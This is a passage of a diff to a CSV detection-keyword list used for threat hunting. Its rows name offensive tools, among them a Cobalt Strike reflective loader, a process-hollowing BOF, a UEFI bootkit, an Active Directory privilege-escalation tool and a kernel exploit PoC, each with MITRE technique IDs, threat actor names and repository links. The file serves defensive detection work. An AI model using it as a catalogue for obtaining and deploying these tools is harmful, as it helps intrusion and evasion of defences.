proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_pe_MZ_from_C2Profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_strrep*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku7/BokuLoader*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_customMZ*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_customPE*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_mask_*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_pe_MZ_from_C2Profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku_strrep*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*boku7/BokuLoader*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "*boku7/HOLLOW*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" -"*BokuLoader.cna*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*BokuLoader.exe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*BokuLoader.x64*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*bolt://localhost:7687*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*BokuLoader.cna*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*BokuLoader.exe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*BokuLoader.x64*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*bolt://localhost:7687*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*Bonfee/CVE-2022-0995*","offensive_tool_keyword","POC","CVE-2022-0995 exploit","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/Bonfee/CVE-2022-0995","1","1","N/A","N/A","5","490","71","2022-03-27T09:07:01Z","2022-03-26T21:46:09Z" "*BooExecutorImpl.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bootkit-rs.git*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" -"*bootkit-rs-master*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*bootkit-rs.git*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense 